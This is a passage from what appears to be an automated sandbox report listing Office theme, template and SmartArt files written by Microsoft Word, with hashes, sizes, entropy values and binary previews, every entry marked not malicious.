                            SHA-256:5FFF5F1EC1686C138192317D5A67E22A6B02E5AAE89D73D4B19A492C2F5BE2F9
                            SHA-512:01D27377942F69A0F2FE240DD73A1F97BB915E19D3D716EE4296C6EF8D8933C80E4E0C02F6C9FA72E531246713364190A2F67F43EDBE12826A1529BC2A629B00
                            Malicious:false
                            Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .D.r.o.p.l.e.t...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft OOXML
                            Category:dropped
                            Size (bytes):1091485
                            Entropy (8bit):7.906659368807194
                            Encrypted:false
                            SSDEEP:24576:oBpmCkw3Tg/euEB+UdoC4k7ytHkHA6B/puqW2MIkTeSBmKrZHQ:MR3c/AseydwppC7veSBmWHQ
                            MD5:2192871A20313BEC581B277E405C6322
                            SHA1:1F9A6A5E10E1C3FFEB6B6725C5D2FA9ECDF51085
                            SHA-256:A06B302954A4C9A6A104A8691864A9577B0BFEA240B0915D9BEA006E98CDFFEC
                            SHA-512:6D8844D2807BB90AEA6FE0DDDB9C67542F587EC9B7FC762746164B2D4A1A99EF8368A70C97BAD7A986AAA80847F64408F50F4707BB039FCCC509133C231D53B9
                            Malicious:false
                            Preview:PK...........G`.jaV....P......[Content_Types].xml...n.@...W......T@.mwM.E....)....y...H}.N..ll8.h5g6Q.=3_......?...x..e^Di.p.^.ud...(Y/..{w..r..9.../M...Q*{..E...(.4..>..y,.>..~&..b-.a.?..4Q2Q=.2.......m....>-....;]......N'..A...g.D.m.@(}..'.3Z....#....(+....-q<uq.+....?....1.....Y?Oy......O"..J?....Q$zT.].7.N..Q Wi.....<.........-..rY....hy.x[9.b.%-<.V?.(......;r.+...Q<.;U.....4...!'k...s.&..)'k...d.s..}R....o".D.I..7..7.KL.7..Z.....v..b.5.2].f....l.t....Z...Uk...j.&.U-....&>.ia1..9lhG..Q.P.'P.U}.k..rU..rU..rU..rU..rU..rU..rU..rU_EK_}.zi.....G.........j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..h.oT/-c..`....7FaBu.@-W.A.]..U}H.U}H.U}H.U}H.U}H.U}H.U}H.U}.-}...e...,..7...&(L.....>.kw...i...i...i...i...i...i...i.......I...U_.....vT.....}..\...v..W.!-W.!-W.!-W.!-W.!-W.!-W.!-W.U...7.....k.pT...0..O.... ...>..>..>..>..>..>..>......f..2V}....W>jO....5..].?.o..oPK...........G.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70.
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):280
                            Entropy (8bit):3.5301133500353727
                            Encrypted:false
                            SSDEEP:6:Q+sxnxUXp2pRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyZ2vymD0wbnKNAH/lMz1
                            MD5:1C5D58A5ED3B40486BC22B254D17D1DD
                            SHA1:69B8BB7B0112B37B9B5F9ADA83D11FBC99FEC80A
                            SHA-256:EBE031C340F04BB0235FE62C5A675CF65C5CC8CE908F4621A4F5D7EE85F83055
                            SHA-512:4736E4F26C6FAAB47718945BA54BD841FE8EF61F0DBA927E5C4488593757DBF09689ABC387A8A44F7C74AA69BA89BEE8EA55C87999898FEFEB232B1BA8CC7086
                            Malicious:false
                            Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .G.a.l.l.e.r.y...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                            Category:dropped
                            Size (bytes):1463634
                            Entropy (8bit):7.898382456989258
                            Encrypted:false
                            SSDEEP:24576:75MGNW/UpLkupMAqDJhNHK4/TuiKbdhbZM+byLH/:7ZwUpLkulkHK46iiDZHeLH/
                            MD5:ACBA78931B156E4AF5C4EF9E4AB3003B
                            SHA1:2A1F506749A046ECFB049F23EC43B429530EC489
                            SHA-256:943E4044C40ABA93BD7EA31E8B5EBEBD7976085E8B1A89E905952FA8DAC7B878
                            SHA-512:2815D912088BA049F468CA9D65B92F8951A9BE82AB194DBFACCF0E91F0202820F5BC9535966654D28F69A8B92D048808E95FEA93042D8C5DEA1DCB0D58BE5175
                            Malicious:false
                            Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):280
                            Entropy (8bit):3.5286004619027067
                            Encrypted:false
                            SSDEEP:6:Q+sxnxUXOzXkRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxny6WymD0wbnKNAH/lMz1
                            MD5:40FF521ED2BA1B015F17F0B0E5D95068
                            SHA1:0F29C084311084B8FDFE67855884D8EB60BDE1A6
                            SHA-256:CC3575BA195F0F271FFEBA6F6634BC9A2CF5F3BE448F58DBC002907D7C81CBBB
                            SHA-512:9507E6145417AC730C284E58DC6B2063719400B395615C40D7885F78F57D55B251CB9C954D573CB8B6F073E4CEA82C0525AE90DEC68251C76A6F1B03FD9943C0
                            Malicious:false
                            Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .C.i.r.c.u.i.t...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft OOXML
                            Category:dropped
                            Size (bytes):3078052
                            Entropy (8bit):7.954129852655753
                            Encrypted:false
                            SSDEEP:49152:bSEjlpY8skyFHuj2yY0ciM9U2NCVBB4YFzYFw7IaJE2VRK+Xn9DOOe9pp9N9Hu:bfp5sksA3cimUVxV05aJE2fKaDOXdN9O
                            MD5:CDF98D6B111CF35576343B962EA5EEC6
                            SHA1:D481A70EC9835B82BD6E54316BF27FAD05F13A1C
                            SHA-256:E3F108DDB3B8581A7A2290DD1E220957E357A802ECA5B3087C95ED13AD93A734
                            SHA-512:95C352869D08C0FE903B15311622003CB4635DE8F3A624C402C869F1715316BE2D8D9C0AB58548A84BBB32757E5A1F244B1014120543581FDEA7D7D9D502EF9C
                            Malicious:false
                            Preview:PK..........1AS'......ip......[Content_Types].xml..n.@.._......8ie'......}.......(y...H}......3Fi..%2.v?..3..._...d=..E.g.....7.i.-.t5.6......}}.m9r.......m...ML.g.M.eV$.r..*.M..l0...A...M..j;.w={o.f..F....i..v......5..d;..D.ySa...M&..qd*w>.O.{h...|w..5.]..'.CS<.:8C}.g.|E.../..>..].Tnml..I.......r.Gv.E....7.;.E......4/l.....6.K.C?1qz.O.v_..r......\c.c.>..lS........X.N.3N.sN..N.)'.%'..'..N.pL.E...T.!..CR....Ie..k.o..M..w.B.0}..3....v..+....,.q..pz.......v{.;....s3.|..V..ZZ......0.[.....x.....!.!~.8.e..n..&.}p....s.i.. ..[]...q.r....~..+.A\...q............e.-)h9..."Z.>...5-C..`..g.}........r.A.+..\...r.>.... .W.\...re?..%.-/hiA..ZR.r.W.D.\}.EK..kZ.>......5..9.&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^h....L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i..`..G..j..).&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^j..K.L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i.
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):274
                            Entropy (8bit):3.5303110391598502
                            Encrypted:false
                            SSDEEP:6:Q+sxnxUXzRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnylymD0wbnKNAH/lMz1
                            MD5:8D1E1991838307E4C2197ECB5BA9FA79
                            SHA1:4AD8BB98DC9C5060B58899B3E9DCBA6890BC9E93
                            SHA-256:4ABA3D10F65D050A19A3C2F57A024DBA342D1E05706A8A3F66B6B8E16A980DB9
                            SHA-512:DCDC9DB834303CC3EC8F1C94D950A104C504C588CE7631CE47E24268AABC18B1C23B6BEC3E2675E8A2A11C4D80EBF020324E0C7F985EA3A7BBC77C1101C23D01
                            Malicious:false
                            Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .M.e.s.h...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft OOXML
                            Category:dropped
                            Size (bytes):2357051
                            Entropy (8bit):7.929430745829162
                            Encrypted:false
                            SSDEEP:49152:tfVcGO3JiR6SgT7/bOCrKCsaFCX3CzwovQTSwW8nX:pVcG2iRedsaoXSzeOwWEX
                            MD5:5BDE450A4BD9EFC71C370C731E6CDF43
                            SHA1:5B223FB902D06F9FCC70C37217277D1E95C8F39D
                            SHA-256:93BFC6AC1DC1CFF497DF92B30B42056C9D422B2321C21D65728B98E420D4ED50
                            SHA-512:2365A9F76DA07D705A6053645FD2334D707967878F930061D451E571D9228C74A8016367525C37D09CB2AD82261B4B9E7CAEFBA0B96CE2374AC1FAC6B7AB5123
                            Malicious:false
                            Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):276
                            Entropy (8bit):3.516423078177173
                            Encrypted:false
                            SSDEEP:6:Q+sxnxUX7kARELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxny5ymD0wbnKNAH/lMz1
                            MD5:5402138088A9CF0993C08A0CA81287B8
                            SHA1:D734BD7F2FB2E0C7D5DB8F70B897376ECA935C9A
                            SHA-256:5C9F5E03EEA4415043E65172AD2729F34BBBFC1A1156A630C65A71CE578EF137
                            SHA-512:F40A8704F16AB1D5DCD861355B07C7CB555934BB9DA85AACDCF869DC942A9314FFA12231F9149D28D438BE6A1A14FCAB332E54B6679E29AD001B546A0F48DE64
                            Malicious:false
                            Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .S.l.a.t.e...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft OOXML
                            Category:dropped
                            Size (bytes):2924237
                            Entropy (8bit):7.970803022812704
                            Encrypted:false
                            SSDEEP:49152:mc4NEo4XNd5wU5qTkdC4+K9u5b/i40RKRAO/cLf68wy9yxKrOUURBgmai2prH:mJef5yTSoKMF//DRGJwLx9DBaH
                            MD5:5AF1581E9E055B6E323129E4B07B1A45
                            SHA1:B849F85BCAF0E1C58FA841FFAE3476D20D33F2DD
                            SHA-256:BDC9FBF81FBE91F5BF286B2CEA00EE76E70752F7E51FE801146B79F9ADCB8E98
                            SHA-512:11BFEF500DAEC099503E8CDB3B4DE4EDE205201C0985DB4CA5EBBA03471502D79D6616D9E8F471809F6F388D7CBB8B0D0799262CBE89FEB13998033E601CEE09
                            Malicious:false
                            Preview:PK.........{MB.$<.~....p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`..^.......H^..<}...lA-.D.....lI/...hD.Z....|VM..ze........L..tU...g....lQ....Y...>MI...5-....S......h=..u.h..?;h...@k...h...'Z...D...;.....h=..'Z...D...;.....)^./.../U.../..../U.../..../U..?...'.........Ngz..A.~.8.#D....xot.u.?...eyot.n..{..sk....[......Z..F....l...o)..o..o...oi..o)..o..,..b.s......2.C.z.~8.......f......x.9.|.8..............u................r.nD..]...........w.~7...-...-...-...-...-...-....x.&l........>.4.z.~8..........=E....As.1..q. 9....w.7...1........w.}7......Ft...................o)..o..o...oi..o)..o..w.7a...x0...........d0..............A.......Fl.............Ft................w#...r.nD..]..M...K1.0..7....
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):286
                            Entropy (8bit):3.5434534344080606
                            Encrypted:false
                            SSDEEP:6:Q+sxnxUXIc5+RELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxny4KcymD0wbnKNAH/lMz1
                            MD5:C9812793A4E94320C49C7CA054EE6AA4
                            SHA1:CC1F88C8F3868B3A9DE7E0E5F928DBD015234ABA
                            SHA-256:A535AE7DD5EDA6D31E1B5053E64D0D7600A7805C6C8F8AF1DB65451822848FFC
                            SHA-512:D28AADEDE0473C5889F3B770E8D34B20570282B154CD9301932BF90BF6205CBBB96B51027DEC6788961BAF2776439ADBF9B56542C82D89280C0BEB600DF4B633
                            Malicious:false
                            Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .M.a.i.n._.E.v.e.n.t...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft OOXML
                            Category:dropped
                            Size (bytes):2218943
                            Entropy (8bit):7.942378408801199
                            Encrypted:false
                            SSDEEP:49152:8mwK3gH/l4hM06Wqnnl1IdO9wASFntrPEWNe7:863gHt4hM9WWnMdO9w35PEWK
                            MD5:EE33FDA08FBF10EF6450B875717F8887
                            SHA1:7DFA77B8F4559115A6BF186EDE51727731D7107D
                            SHA-256:5CF611069F281584DE3E63DE8B99253AA665867299DC0192E8274A32A82CAA20
                            SHA-512:AED6E11003AAAACC3FB28AE838EDA521CB5411155063DFC391ACE2B9CBDFBD5476FAB2B5CC528485943EBBF537B95F026B7B5AB619893716F0A91AEFF076D885
                            Malicious:false
                            Preview:PK.........{MBS'..t...ip......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`.../.|u1..Y.....nK.......u=..2.tu~^L.Y5]/...~+.v...o....j.`?.S...../.by.|..>."kZbs....H.9..m.z.]W.V.?~v........;...N.......w....;.z..N.......w.....R.._..w._..w._..w._..w._..w._..w.n..Ofu.-..K.e........T..q.F...R[...~.u.....Z..F....7.?.v....5O....zot..i.....b...^...Z...V...R...N...r./.?........=....#.`..\~n.n...)J./.......7........+......Q..]n............w......Ft........|......b...^...Z...V...R...N..W<x......l._...l..?.A......x....x.9.|.8..............u................w#.....nD..]...........R.......R.......R........o...].`.....A....#.`..\.....+J./.......7........+......Q..]n.........w9~7......Ft........|......b...^.c..-...-...-
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):278
                            Entropy (8bit):3.544065206514744
                            Encrypted:false
                            SSDEEP:6:Q+sxnxUXCARELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyy6ymD0wbnKNAH/lMz1
                            MD5:06B3DDEFF905F75FA5FA5C5B70DCB938
                            SHA1:E441B94F0621D593DC870A27B28AC6BE3842E7DB
                            SHA-256:72D49BDDE44DAE251AEADF963C336F72FA870C969766A2BB343951E756B3C28A
                            SHA-512:058792BAA633516037E7D833C8F59584BA5742E050FA918B1BEFC6F64A226AB3821B6347A729BEC2DF68BB2DFD2F8E27947F74CD4F6BDF842606B9DEDA0B75CC
                            Malicious:false
                            Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .D.a.m.a.s.k...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):274
                            Entropy (8bit):3.4699940532942914
                            Encrypted:false
                            SSDEEP:6:fxnxUXGWWYlIWimoa2nRE3QepmlJ0+3FbnKfZObdADxp1RDWlVwv:fxny2WzIgN2RGHmD0wbnKYZAH+Vwv
                            MD5:55BA5B2974A072B131249FD9FD42EB91
                            SHA1:6509F8AC0AA23F9B8F3986217190F10206A691EA
                            SHA-256:13FFAAFFC987BAAEF7833CD6A8994E504873290395DC2BD9B8E1D7E7E64199E7
                            SHA-512:3DFB0B21D09B63AF69698252D073D51144B4E6D56C87B092F5D97CE07CBCF9C966828259C8D95944A7732549C554AE1FF363CB936CA50C889C364AA97501B558
                            Malicious:false
                            Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .I.n.s.i.g.h.t. .d.e.s.i.g.n. .s.e.t...d.o.t.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.W.D. .D.o.c.u.m.e.n.t. .P.a.r.t.s.}.........
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Word 2007+
                            Category:dropped
                            Size (bytes):3465076
                            Entropy (8bit):7.898517227646252
                            Encrypted:false
                            SSDEEP:98304:n8ItVaN7vTMZ9IBbaETXbI8ItVaN7vTMZ9IBbaEiXbY:8ItwNX9BvTvItwNX9BvoM
                            MD5:8BC84DB5A3B2F8AE2940D3FB19B43787
                            SHA1:3A5FE7B14D020FAD0E25CD1DF67864E3E23254EE
                            SHA-256:AF1FDEEA092169BF794CDC290BCA20AEA07AC7097D0EFCAB76F783FA38FDACDD
                            SHA-512:558F52C2C79BF4A3FBB8BB7B1C671AFD70A2EC0B1BDE10AC0FED6F5398E53ED3B2087B38B7A4A3D209E4F1B34150506E1BA362E4E1620A47ED9A1C7924BB9995
                            Malicious:false
                            Preview:PK.........Y5B................[Content_Types].xml ...(.................................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`..^.....g.../i..b../..}.-......U.....o.7B.......}@[..4o...E9n..h...Y....D.%......F....g..-!.|p.....7.pQVM.....B.g.-.7....:...d.2...7bA..Us.z.`.r..,.m."..n....s.O^.....fL.........7.....-...gn,J..iU..$.......i...(..dz.....3|
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft OOXML
                            Category:dropped
                            Size (bytes):3611324
                            Entropy (8bit):7.965784120725206
                            Encrypted:false
                            SSDEEP:49152:ixc1kZBIabo4dTJyr3hJ50gd9OaFxTy+1Nn/M/noivF0po3M0h0Vsm:ixcaAabT83hJLdoaFxTygxcoiX3M0iCm
                            MD5:FB88BFB743EEA98506536FC44B053BD0
                            SHA1:B27A67A5EEC1B5F9E7A9C3B76223EDE4FCAF5537
                            SHA-256:05057213BA7E5437AC3B8E9071A5577A8F04B1A67EFE25A08D3884249A22FBBF
                            SHA-512:4270A19F4D73297EEC910B81FF17441F3FC7A6A2A84EBA2EA3F7388DD3AA0BA31E9E455CFF93D0A34F4EC7CA74672D407A1C4DC838A130E678CA92A2E085851C
                            Malicious:false
                            Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):288
                            Entropy (8bit):3.5359188337181853
                            Encrypted:false
                            SSDEEP:6:Q+sxnxUXe46x8RELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyO3UymD0wbnKNAH/lMz1
                            MD5:0FEA64606C519B78B7A52639FEA11492
                            SHA1:FC9A6D5185088318032FD212F6BDCBD1CF2FFE76
                            SHA-256:60059C4DD87A74A2DC36748941CF5A421ED394368E0AA19ACA90D850FA6E4A13
                            SHA-512:E04102E435B8297BF33086C0AD291AD36B5B4A97A59767F9CAC181D17CFB21D3CAA3235C7CD59BB301C58169C51C05DDDF2D637214384B9CC0324DAB0BB1EF8D
                            Malicious:false
                            Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .V.a.p.o.r._.T.r.a.i.l...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Cabinet archive data, many, 4967 bytes, 2 files, at 0x44 "TabList.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                            Category:dropped
                            Size (bytes):21111
                            Entropy (8bit):7.6297992466897675
                            Encrypted:false
                            SSDEEP:384:wWZsOvbMZGgbA8E0GftpBjEtnFLrHRN7Dfll7PK/pirk:xZRvuzA8Pi6t9DPISk
                            MD5:D30AD26DBB6DECA4FDD294F48EDAD55D
                            SHA1:CA767A1B6AF72CF170C9E10438F61797E0F2E8CE
                            SHA-256:6B1633DD765A11E7ED26F8F9A4DD45023B3E4ADB903C934DF3917D07A3856BFF
                            SHA-512:7B519F5D82BA0DA3B2EFFAD3029C7CAB63905D534F3CF1F7EA3446C42FA2130665CA7569A105C18289D65FA955C5624009C1D571E8960D2B7C52E0D8B42BE457
                            Malicious:false
                            Preview:MSCF....g.......D...........................g....?..........}.......................TabList.glox.................Content.inf....t....[......@..C...../.U5...........6...`.....T..>3.................=..09`..t......a..Y..BI.Z....=.'0...%...T..........H...>.:A.r......n..p...Pf.h...I.8... ....M.]&.#.vv'.....[c......g....>"......<c..f....i...sb!Z..iu<.%|......q.....G28.h-...7.....W.v...RtdK..F~.0.3.'.e..b7.c......a.3.....a\..]...gp8.+.u/}.w.qF........8.=.=|....\~..S.-q}]0...q.B.H.^J...!...a'.2Tn!..."..%........=.e_-.....{o..%o...a`.w..L.5..r.....e.8...pO..RE.Wgr..b.%.E...O.......8s...E....Um].C..M.....[...H.FZ..4...eZI.$..v.3<]..r....B..............8i......e<.D...Q4.q.^S.....H.b.......r.q..0o.......2..PP,."...JI...xU`.6f..K..Q9.Q..h..t....AI.S6...7............X..`dv..r..S....),7ES....#.....(...\.nh...X.ps%l..F...."<_....q....v........_.e.....P.........|&..fi..4..@..^0..v.]7.......^. ."..}(...w.g.X...=<....p.......L...P..XV....@:....N...Y....
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Cabinet archive data, many, 7453 bytes, 2 files, at 0x44 "pictureorgchart.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                            Category:dropped
                            Size (bytes):23597
                            Entropy (8bit):7.692965575678876
                            Encrypted:false
                            SSDEEP:384:y6aR//q0bJi/Uj+957G8E0GftpBj/4YOFLrHRN7LxhKll7PK/ph:y6I/Li/UjmVG8PiZ4YsLxh6Ih
                            MD5:7C645EC505982FE529D0E5035B378FFC
                            SHA1:1488ED81B350938D68A47C7F0BCE8D91FB1673E2
                            SHA-256:298FD9DADF0ACEBB2AA058A09EEBFAE15E5D1C5A8982DEE6669C63FB6119A13D
                            SHA-512:9F410DA5DB24B0B72E7774B4CF4398EDF0D361B9A79FBE2736A1DDD770AFE280877F5B430E0D26147CCA0524A54EA8B41F88B771F3598C2744A7803237B314B2
                            Malicious:false
